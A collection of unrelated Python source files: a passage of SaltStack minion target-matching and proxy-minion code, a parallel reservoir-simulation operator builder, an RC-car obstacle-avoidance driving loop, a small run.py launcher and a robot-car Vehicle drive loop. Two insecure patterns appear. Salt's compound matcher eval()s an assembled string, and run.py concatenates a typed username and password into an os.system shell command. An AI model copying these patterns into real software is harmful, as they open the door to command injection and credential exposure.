def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = str(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
                        if results[-1] not in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
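# A minimal, hypothetical sketch of the reduction compound_match performs
# above: operator words pass through unchanged, every other word is replaced
# by the string 'True' or 'False' from its match engine, and the resulting
# boolean expression is eval()'d. The stand-in matcher below is not Salt API.
def _compound_reduction_example():
    words = 'G@os:Ubuntu and not L@minion1,minion2'.split()
    opers = ('and', 'or', 'not', '(', ')')
    fake_match = lambda word: word.startswith('G@')  # stand-in for a real engine call
    results = [word if word in opers else str(fake_match(word)) for word in words]
    return eval(' '.join(results))  # 'True and not False' -> True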
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
log.debug("subclassed _post_master_init")
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar']:
log.error('No proxy key found in pillar for id '+self.opts['id']+'.')
log.error('Check your pillar configuration and contents. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
fq_proxyname = self.opts['pillar']['proxy']['proxytype']
self.opts['proxy'] = self.opts['pillar']['proxy']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors = self._load_modules()
# we can then sync any proxymodules down from the master
self.functions['saltutil.sync_proxymodules'](saltenv='base')
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
        # Check config 'add_proxymodule_to_opts'. Remove this in Boron.
if self.opts['add_proxymodule_to_opts']:
self.opts['proxymodule'] = self.proxy
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors = self._load_modules(proxy=self.proxy)
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
log.error('Proxymodule {0} is missing an init() or a shutdown() or both.'.format(fq_proxyname))
log.error('Check your proxymodule. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
# Proxies have a chicken-and-egg problem. Usually we load grains early
# in the setup process, but we can't load grains for proxies until
# we talk to the device we are proxying for. So reload the grains
# functions here, and then force a grains sync in modules_refresh
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh=True)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
        # add default scheduling jobs to the minion's scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
}, persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
|
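The MultiSyndic failover above walks its masters in shuffled order, always yielding the requested master first when it is known. A minimal standalone sketch of that iteration pattern, with a plain dict standing in for the syndic futures:

from random import shuffle

def iter_master_options(syndics, master_id=None):
    # yield (master, connection) pairs, preferring master_id when known
    masters = list(syndics.keys())
    shuffle(masters)
    if master_id not in syndics:
        master_id = masters.pop(0)
    else:
        masters.remove(master_id)
    while True:
        yield master_id, syndics[master_id]
        if not masters:
            break
        master_id = masters.pop(0)

for master, conn in iter_master_options({'m1': 'c1', 'm2': 'c2'}, 'm2'):
    print(master, conn)  # 'm2' first, then 'm1'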
paralel_ams_new0.py
|
import numpy as np
import scipy.sparse as sp
from scipy.sparse import linalg
from .ams_tpfa_new0 import AMSTpfa
from .....common_files.common_infos import CommonInfos
import multiprocessing as mp
import collections
import time
def run_thing(local_operator_obj):
local_operator_obj.run()
class SubDomain(CommonInfos):
def __init__(self,
T: 'global transmissibility matrix',
g_local_ids: 'global id of local volumes',
dual_flags: 'dual flags of g_local_ids',
primal_ids: 'primal ids of g_local_ids',
get_correction_term=False,
B_matrix=None,
Eps_matrix=None,
total_source_term=None):
dual_ids = dual_flags
self.get_correction_term = get_correction_term
if get_correction_term:
self.l_B_matrix = self.get_local_matrix(B_matrix, g_local_ids)
self.l_Eps_matrix = self.get_local_matrix(Eps_matrix, g_local_ids)
self.l_total_source_term = total_source_term[g_local_ids]
else:
self.l_B_matrix = None
self.l_Eps_matrix = None
self.l_total_source_term = None
self.l_dual_flags = dual_flags
self.l_T = self.get_local_t(T, g_local_ids) # local transmissibility
self.g_local_ids = g_local_ids
local_dual_id = dual_ids
g_vertices = g_local_ids[local_dual_id==3]
global_primal_ids = primal_ids
local_primal_ids = np.arange(len(g_vertices))
primal_ids_vertices = primal_ids[local_dual_id==3]
map_primal_ids = dict(zip(primal_ids_vertices, local_primal_ids))
self.r_map_primal_ids = dict(zip(local_primal_ids, primal_ids_vertices))
self.local_ids = np.arange(len(g_local_ids))
# map_gids = dict(zip(g_local_ids, self.local_ids))
# map_gids = np.repeat(-1, g_local_ids.max()+1)
# map_gids[g_local_ids] = self.local_ids
self.l_primal_ids = np.array([map_primal_ids[k] for k in global_primal_ids])
# self.l_interns = self.local_ids[local_dual_id==0]
# self.l_faces = self.local_ids[local_dual_id==1]
# self.l_edges = self.local_ids[local_dual_id==2]
# self.l_vertices = self.local_ids[local_dual_id==3]
class LocalOperator:
def __init__(self,
subDomains: 'list of SubDomains',
comm: 'comunicator'
):
self.subdomains = subDomains
self.comm = comm
def run(self):
lines = []
cols = []
data = []
all_pcorr = []
for subd in self.subdomains:
operator = AMSTpfa(subd.local_ids, subd.l_dual_flags, subd.l_primal_ids, get_correction_term=subd.get_correction_term)
op, pcorr = operator.run(subd.l_T, total_source_term=subd.l_total_source_term, B_matrix=subd.l_B_matrix, Eps_matrix=subd.l_Eps_matrix)
subd.local_ids[:] = subd.g_local_ids
ff = sp.find(op)
ls = subd.local_ids[ff[0]]
cs = np.array([subd.r_map_primal_ids[k] for k in ff[1]])
ds = ff[2]
lines.append(ls)
cols.append(cs)
data.append(ds)
all_pcorr.append(np.array([subd.g_local_ids, pcorr]))
        # object dtype: the four fields are ragged lists of arrays
        structure = np.array([lines, cols, data, all_pcorr], dtype=object)
self.comm.send(structure)
class MasterOP:
def __init__(self,
T: 'global transmissibility matrix',
all_dual_subsets: 'all dual volumes',
level,
get_correction_term=False,
total_source_term=None,
B_matrix=None,
Eps_matrix=None):
n_cpu = mp.cpu_count()
self.n_workers = n_cpu
self.level = level
self.n_total = T.shape[0]
self.get_correction_term = get_correction_term
list_of_subdomains = self.get_list_subdomains(T, all_dual_subsets, get_correction_term, B_matrix=B_matrix,
Eps_matrix=Eps_matrix, total_source_term=total_source_term)
list_of_process_per_cpu = []
n_subdomains = len(list_of_subdomains)
resto = n_subdomains % self.n_workers
n_process_per_cpu = n_subdomains//self.n_workers
        if n_process_per_cpu > 0:
            for i in range(self.n_workers):
                list_of_process_per_cpu.append(list_of_subdomains[i*n_process_per_cpu:n_process_per_cpu*(i+1)])
            # distribute the remainder, one leftover subdomain per worker
            for i in range(resto):
                list_of_process_per_cpu[i].append(list_of_subdomains[n_process_per_cpu*self.n_workers + i])
        else:
            # fewer subdomains than workers: one subdomain per worker
            self.n_workers = resto
            for i in range(resto):
                list_of_process_per_cpu.append([list_of_subdomains[i]])
self.list_of_process_per_cpu = list_of_process_per_cpu
def get_list_subdomains(self, T, all_dual_subsets, get_correction_term=False, B_matrix=None, Eps_matrix=None, total_source_term=None):
list_of_subdomains = []
for dual_subset in all_dual_subsets:
sarray = dual_subset
volumes = sarray['volumes']
dual_ids1 = sarray['dual_id']
primal_ids1 = sarray['primal_id']
# all_edges = volumes[dual_ids1==2]
# contador = collections.Counter(all_edges)
# coupled_edges = np.array([k for k, v in contador.items() if v > 1])
# local_gids = np.unique(volumes)
local_gids = volumes
# dual_ids = np.concatenate([dual_ids1[volumes==k] for k in local_gids])
dual_ids = dual_ids1
# primal_ids = np.concatenate([primal_ids1[volumes==k] for k in local_gids])
primal_ids = primal_ids1
list_of_subdomains.append(SubDomain(T, local_gids, dual_ids, primal_ids, get_correction_term=get_correction_term, B_matrix=B_matrix, Eps_matrix=Eps_matrix, total_source_term=total_source_term))
return list_of_subdomains
def get_data_for_op(self, all_lines, all_cols, all_datas, set_lines):
lines = []
cols = []
data = []
ps = []
for ls, cs, ds in zip(all_lines, all_cols, all_datas):
resp = set(ls) - set_lines
if resp:
conj_lines = []
for k in resp:
indice = np.where(ls == k)[0]
conj_lines.append(indice)
conj_lines = np.concatenate(conj_lines)
resp_ls = ls[conj_lines]
resp_cols = cs[conj_lines]
resp_data = ds[conj_lines]
lines.append(resp_ls)
cols.append(resp_cols)
data.append(resp_data)
set_lines = set_lines | resp
lines = np.concatenate(lines).astype(np.int64)
cols = np.concatenate(cols).astype(np.int64)
data = np.concatenate(data)
return lines, cols, data, set_lines
def run(self):
master2worker = [mp.Pipe() for _ in range(self.n_workers)]
m2w, w2m = list(zip(*master2worker))
procs = [mp.Process(target=run_thing, args=[LocalOperator(obj, comm)]) for obj, comm in zip(self.list_of_process_per_cpu, w2m)]
del self.list_of_process_per_cpu
lines = []
cols = []
data = []
pcorr = np.zeros(self.n_total)
set_lines = set()
for proc in procs:
proc.start()
for comm in m2w:
msg = comm.recv()
resp = msg
all_lines = resp[0]
all_cols = resp[1]
all_datas = resp[2]
all_pcorr = resp[3]
ls, cs, ds, set_lines = self.get_data_for_op(all_lines, all_cols, all_datas, set_lines)
lines.append(ls)
cols.append(cs)
data.append(ds)
for ppp in all_pcorr:
pcorr[ppp[0].astype(int)] = ppp[1]
for proc in procs:
proc.join()
lines = np.concatenate(lines).astype(np.int64)
cols = np.concatenate(cols).astype(np.int64)
data = np.concatenate(data)
n_volumes = lines.max() + 1
n_c_volumes = cols.max() + 1
OP = sp.csc_matrix((data, (lines, cols)), shape=(n_volumes, n_c_volumes))
return OP, pcorr
|
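MasterOP.run above fans the subdomain chunks out over one Process per worker and collects each worker's partial result through its end of a multiprocessing.Pipe. A minimal sketch of that pattern, with a trivial sum standing in for LocalOperator.run:

import multiprocessing as mp

def worker(chunk, comm):
    comm.send(sum(chunk))  # stand-in for LocalOperator.run()

if __name__ == '__main__':
    chunks = [[1, 2], [3, 4], [5, 6]]
    pipes = [mp.Pipe() for _ in chunks]
    m2w, w2m = zip(*pipes)
    procs = [mp.Process(target=worker, args=(c, comm)) for c, comm in zip(chunks, w2m)]
    for p in procs:
        p.start()
    partials = [comm.recv() for comm in m2w]  # recv before join, as MasterOP.run does
    for p in procs:
        p.join()
    print(partials)  # [3, 7, 11]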
run_car_ai.py
|
# coding: utf-8
# RC car self-driving code
import time
import logging
import threading
import numpy as np
from lib import Kerberos
from lib import Car
from lib import SPI
from lib import AI
from generator import SensorGenerator
import copy
import sys
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY2:
import Queue
elif PY3:
import queue as Queue
# Logging configuration
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] time:%(created).8f pid:%(process)d pn:%(processName)-10s tid:%(thread)d tn:%(threadName)-10s fn:%(funcName)-10s %(message)s',
)
########################################
# Status flags
########################################
MAIN_THREAD_RUN = True
FORCE_STOP_THREAD_RUN = True
########################################
# Function that keeps polling the stop-button value
########################################
def do_force_stop_button():
global FORCE_STOP_THREAD_RUN
global MAIN_THREAD_RUN
    # Prepare the stop button
A0 = 0 # SPI PIN
STOP_BUTTON_SPI_PIN = A0
spi = SPI()
while FORCE_STOP_THREAD_RUN:
data = spi.readadc(STOP_BUTTON_SPI_PIN)
if data >= 1000:
            # the stop button was pressed
MAIN_THREAD_RUN = False
FORCE_STOP_THREAD_RUN = False
break
time.sleep(0.1)
return
'''
Main processing.
'''
def main():
global MAIN_THREAD_RUN
global FORCE_STOP_THREAD_RUN
    # Prepare the car
STOP=0
LEFT=1
FORWARD=2
RIGHT=3
    HANDLE_NEUTRAL = 95 # steering neutral position
    HANDLE_ANGLE = 42 # maximum left/right steering angle
car = Car()
speed = 0
angle = HANDLE_NEUTRAL
    ratio = 1.0 # steering-angle control ratio
    count_stop = 0 # number of consecutive stop decisions
    # Prepare the AI
    ai = AI()
    score = 0.6 # score threshold
    back_forward = 5 # when reversing, number of steps to reverse straight
    back_angle = 7 # when reversing, number of steps to reverse using the proximity sensors
    max_log_length = 20 # number of steering-log entries to keep; max_log_length > back_forward
    log_queue = Queue.Queue(maxsize=max_log_length) # holds AI predictions for use when reversing
    copy_log_queue = Queue.Queue(maxsize=max_log_length) # backup of log_queue for consecutive reverse maneuvers
    back_queue = Queue.LifoQueue(maxsize=max_log_length) # reverse-direction queue
    # Prepare the IF (AI training-data generator)
generator = SensorGenerator()
    # Prepare the proximity sensors
kerberos = Kerberos()
LIDAR_INTERVAL = 0.05
try:
learned_step = ai.get_learned_step()
print("learned_step:{}".format(learned_step))
while MAIN_THREAD_RUN:
            if not FORCE_STOP_THREAD_RUN: break # break out on forced stop
            ########################################
            # Read the proximity sensor values
            ########################################
            '''
            Distances are read here because they feed both the speed and steering control
            '''
            distance1,distance2,distance3 = kerberos.get_distance()
            sensors = [distance1,distance2,distance3]
            ########################################
            # Get the AI prediction
            ########################################
            # Get this iteration's prediction
            ai_value = ai.get_prediction(sensors,score)
            ########################################
            # Get the IF result
            ########################################
            # Get this iteration's result
            #w = generator.driving_instruction(sensors)
            #ai_value = np.argmax(w[0:4])
print("ai_value:{} {}".format(ai_value,sensors))
            # Do nothing when the prediction score is low
if ai_value == ai.get_other_label():
time.sleep(LIDAR_INTERVAL)
continue
            ########################################
            # Adjust the speed
            ########################################
if distance2 >= 100:
speed = 100
else:
speed = int(distance2 + (100 - distance2)/2)
if speed < 40:
speed = 40
            ########################################
            # Adjust the steering angle
            ########################################
            if ai_value == 1: # going left, but scale the steering angle by the left/right space ratio
                ratio = float(distance1)/(distance1 + distance3) # reduce the angle proportionally
                if distance2 < 75 or distance3 < 8.0:
                    ratio = 1.0
            elif ai_value == 3: # going right, but scale the steering angle by the left/right space ratio
                ratio = float(distance3)/(distance1 + distance3) # reduce the angle proportionally
                if distance2 < 75 or distance1 < 8.0:
                    ratio = 1.0
            else:
                ratio = 1.0
            if not FORCE_STOP_THREAD_RUN: break # break out on forced stop
            ########################################
            # Drive the robot car: forward, left/right, or stop
            ########################################
if ai_value == STOP:
car.stop()
car.set_angle(HANDLE_NEUTRAL)
elif ai_value == LEFT:
car.set_angle(HANDLE_NEUTRAL - (HANDLE_ANGLE * ratio))
car.forward(speed)
elif ai_value == FORWARD:
car.forward(speed)
car.set_angle(HANDLE_NEUTRAL)
elif ai_value == RIGHT:
car.set_angle(HANDLE_NEUTRAL + (HANDLE_ANGLE * ratio))
car.forward(speed)
            ########################################
            # If stopped, reverse the robot car
            ########################################
            '''
            When reversing, reverse straight for N entries of the recent steering log,
            then reverse with opposite steering for M entries.
            After that, steer toward the narrower side while reversing.
            '''
if ai_value == STOP:
                time.sleep(1) # wait 1 second after stopping for the chassis to settle
                if not FORCE_STOP_THREAD_RUN: break # break out on forced stop
count_stop += 1
if count_stop >= 1:
                    # Build the steering queue used while reversing
                    copy_log_queue.queue = copy.deepcopy(log_queue.queue)
                    # If the steering log is short, pad the reverse steering queue with FORWARD
                    if log_queue.qsize() < max_log_length:
                        for i in range(log_queue.qsize(),max_log_length):
                            back_queue.put(FORWARD)
                    while not log_queue.empty():
                        back_queue.put(log_queue.get(block=False))
                    log_queue.queue = copy.deepcopy(copy_log_queue.queue)
                    speed = 60
                    car.back(speed) # reverse
                    ####################
                    # Reverse straight for N entries
                    ####################
                    for i in range(0,back_forward):
                        if not FORCE_STOP_THREAD_RUN: break # break out on forced stop
                        car.set_angle(HANDLE_NEUTRAL)
                        # Remove N entries, one per step, from the reverse steering queue
                        back_queue.get(block=False)
                        time.sleep(LIDAR_INTERVAL)
                    ####################
                    # Steer toward the dominant direction of the remaining log entries
                    ####################
                    angle = 0 # which of left/right dominates
                    angle_forward = 0 # number of forward entries
                    back_queue_size = back_queue.qsize()
                    for i in range(0,back_queue_size):
                        value = back_queue.get(block=False)
                        if value == RIGHT:
                            angle += 1
                        elif value == LEFT:
                            angle -= 1
                        elif value == FORWARD:
                            angle_forward += 1
                    if angle_forward >= back_queue_size/3: # the log is mostly forward, so reverse straight
                        back = FORWARD
                    elif angle > 0: # the log is mostly left, so reverse to the right
                        back = RIGHT
                    else: # the log is mostly right, so reverse to the left
                        back = LEFT
                    for i in range(0,back_queue_size):
                        if not FORCE_STOP_THREAD_RUN: break # break out on forced stop
                        if back == LEFT:
                            car.set_angle(HANDLE_NEUTRAL + HANDLE_ANGLE) # steer right, opposite to the previous steering direction
                        elif back == RIGHT:
                            car.set_angle(HANDLE_NEUTRAL - HANDLE_ANGLE) # steer left, opposite to the previous steering direction
                        elif back == FORWARD:
                            car.set_angle(HANDLE_NEUTRAL)
                        time.sleep(LIDAR_INTERVAL)
                    '''
                    # Reverse for M entries using a single proximity sensor reading
                    distance1,distance2,distance3 = kerberos.get_distance()
                    for i in range(0,back_angle):
                        if not FORCE_STOP_THREAD_RUN: break # break out on forced stop
                        if distance1 >= distance3: # the right side is narrower, so steer right
                            car.set_angle(HANDLE_NEUTRAL + HANDLE_ANGLE) # steer right
                        else:
                            car.set_angle(HANDLE_NEUTRAL - HANDLE_ANGLE) # steer left
                        time.sleep(LIDAR_INTERVAL)
                    '''
                    ####################
                    # If no open space of at least 20 cm is found to the left, front, or right, keep reversing
                    ####################
                    speed=60
                    car.back(speed) # reverse
                    while True:
                        if not FORCE_STOP_THREAD_RUN: break # break out on forced stop
                        distance1,distance2,distance3 = kerberos.get_distance()
                        if distance1 > 20 and distance2 > 20 and distance3 > 20:
                            break
                        if distance1 >= distance3*2: # the right side is far narrower, so steer right
                            car.set_angle(HANDLE_NEUTRAL + HANDLE_ANGLE) # steer right
                        elif distance3 >= distance1*2: # the left side is far narrower, so steer left
                            car.set_angle(HANDLE_NEUTRAL - HANDLE_ANGLE) # steer left
                        elif distance1 >= distance3: # steer slightly to the right
                            ratio = float(distance3)/(distance1 + distance3) # reduce the angle proportionally
                            car.set_angle(HANDLE_NEUTRAL + HANDLE_ANGLE*ratio) # steer right
                        elif distance3 >= distance1: # steer slightly to the left
                            ratio = float(distance1)/(distance1 + distance3) # reduce the angle proportionally
                            car.set_angle(HANDLE_NEUTRAL - HANDLE_ANGLE*ratio) # steer left
                        time.sleep(0.1)
                    if not FORCE_STOP_THREAD_RUN: break # break out on forced stop
                    car.stop()
                    count_stop = 0
                    ai_value = 0
                    speed = 0
                    time.sleep(0.5) # wait 0.5 seconds after stopping
                    car.set_angle(HANDLE_NEUTRAL)
                    time.sleep(0.5) # wait 0.5 seconds for the steering correction after stopping
                    if not FORCE_STOP_THREAD_RUN: break # break out on forced stop
            else:
                if not FORCE_STOP_THREAD_RUN: break # break out on forced stop
                count_stop = 0
                # While moving forward, remember the most recent steering command
qsize = log_queue.qsize()
if qsize >= max_log_length:
log_queue.get(block=False)
qsize = log_queue.qsize()
log_queue.put(ai_value)
time.sleep(LIDAR_INTERVAL)
except:
import traceback
traceback.print_exc()
print('error! main failed.')
finally:
print("main end")
        # Stop the button-monitoring thread
FORCE_STOP_THREAD_RUN = False
car.stop()
car.set_angle(HANDLE_NEUTRAL)
pass
return
if __name__ == '__main__':
    # Start the thread that monitors the stop button
t = threading.Thread(target=do_force_stop_button,args=())
t.start()
main()
|
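The reverse maneuver in run_car_ai.main decides its steering by voting over the recent command log. A minimal sketch of just that vote, using the same constants as the script:

STOP, LEFT, FORWARD, RIGHT = 0, 1, 2, 3

def choose_back_direction(recent_commands):
    # tally right (+1) against left (-1), and count forward entries separately
    angle = sum(1 if c == RIGHT else -1 if c == LEFT else 0 for c in recent_commands)
    angle_forward = sum(1 for c in recent_commands if c == FORWARD)
    if angle_forward >= len(recent_commands) / 3:
        return FORWARD  # mostly straight, so reverse straight
    return RIGHT if angle > 0 else LEFT

print(choose_back_direction([RIGHT, RIGHT, LEFT, FORWARD]))  # 3 (RIGHT)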
run.py
|
from multiprocessing import Process
import os
from getpass import getpass
def func1(usrn,passw):
string = 'node bin/cloudcmd.js -u '+usrn+' -p '+ passw + ' --root ../files'
os.system(string)
def func2():
os.system('node ./lib/index.js -d ../files/upload')
if __name__ == '__main__':
os.chdir('admin')
os.system('npm install')
os.system('npm run build')
usern = raw_input("Enter your admin user name : ")
passw = getpass("Enter your admin password: ")
p1 = Process(target=func1, args=(usern,passw))
p1.start()
os.chdir('../file_man')
os.system('npm install')
p2 = Process(target=func2)
p2.start()
p1.join()
p2.join()
|
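run.py wraps each os.system call in a multiprocessing.Process so the two node services run concurrently and can both be joined. A sketch of the same idea with subprocess.Popen, which avoids the intermediate Python processes; the commands and working directories mirror the script and are assumptions about the repository layout:

import subprocess

# start both long-running services without blocking
admin = subprocess.Popen('node bin/cloudcmd.js --root ../files', shell=True, cwd='admin')
files = subprocess.Popen('node ./lib/index.js -d ../files/upload', shell=True, cwd='file_man')

# wait on both, as run.py does with p1.join() / p2.join()
admin.wait()
files.wait()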
vehicle.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 25 10:44:24 2017
@author: wroscoe
"""
from builtins import bool
from threading import Thread
import time
from .log import get_logger
from .memory import Memory
logger = get_logger(__name__)
class Vehicle:
def __init__(self, mem=None):
if not mem:
mem = Memory()
self.mem = mem
self.parts = []
self.on = True
self.threads = []
self.current_drive_mode=None
self.current_cam_status=None
def add(self, part, inputs=[], outputs=[],
threaded=False, run_condition=None):
"""
Method to add a part to the vehicle drive loop.
Parameters
----------
inputs : list
Channel names to get from memory.
outputs : list
Channel names to save to memory.
threaded : boolean
If a part should be run in a separate thread.
run_condition: boolean
If a part should be run at all.
"""
assert type(inputs) is list, "inputs is not a list: %r" % inputs
assert type(outputs) is list, "outputs is not a list: %r" % outputs
assert type(threaded) is bool, "threaded is not a boolean: %r" % threaded
p = part
logger.info('Adding part {}.'.format(p.__class__.__name__))
entry = dict()
entry['part'] = p
entry['inputs'] = inputs
entry['outputs'] = outputs
entry['run_condition'] = run_condition
if threaded:
t = Thread(target=part.update, args=())
t.daemon = True
entry['thread'] = t
self.parts.append(entry)
def start(self, rate_hz=10, max_loop_count=None):
"""
Start vehicle's main drive loop.
This is the main thread of the vehicle. It starts all the new
        threads for the threaded parts, then starts an infinite loop
that runs each part and updates the memory.
Parameters
----------
rate_hz : int
The max frequency that the drive loop should run. The actual
frequency may be less than this if there are many blocking parts.
max_loop_count : int
            Maximum number of loops the drive loop should execute. This is
            used for testing that all the parts of the vehicle work.
"""
try:
self.on = True
for entry in self.parts:
if entry.get('thread'):
# start the update thread
entry.get('thread').start()
# wait until the parts warm up.
logger.info('Starting vehicle...')
time.sleep(1)
loop_count = 0
while self.on:
start_time = time.time()
loop_count += 1
self.update_parts()
                # stop drive loop if loop_count exceeds max_loop_count
if max_loop_count and loop_count > max_loop_count:
self.on = False
sleep_time = 1.0 / rate_hz - (time.time() - start_time)
if sleep_time > 0.0:
time.sleep(sleep_time)
except KeyboardInterrupt:
pass
finally:
self.stop()
def update_parts(self):
"""
loop over all parts
"""
for entry in self.parts:
# don't run if there is a run condition that is False
run = True
if entry.get('run_condition'):
run_condition = entry.get('run_condition')
run = self.mem.get([run_condition])[0]
# print('run_condition', entry['part'], entry.get('run_condition'), run)
if run:
p = entry['part']
# get inputs from memory
inputs = self.mem.get(entry['inputs'])
# run the part
if entry.get('thread'):
outputs = p.run_threaded(*inputs)
else:
outputs = p.run(*inputs)
# save the output to memory
if outputs is not None:
self.mem.put(entry['outputs'], outputs)
def stop(self):
logger.info('Shutting down vehicle and its parts...')
for entry in self.parts:
try:
entry['part'].shutdown()
except Exception as e:
logger.debug(e)
|
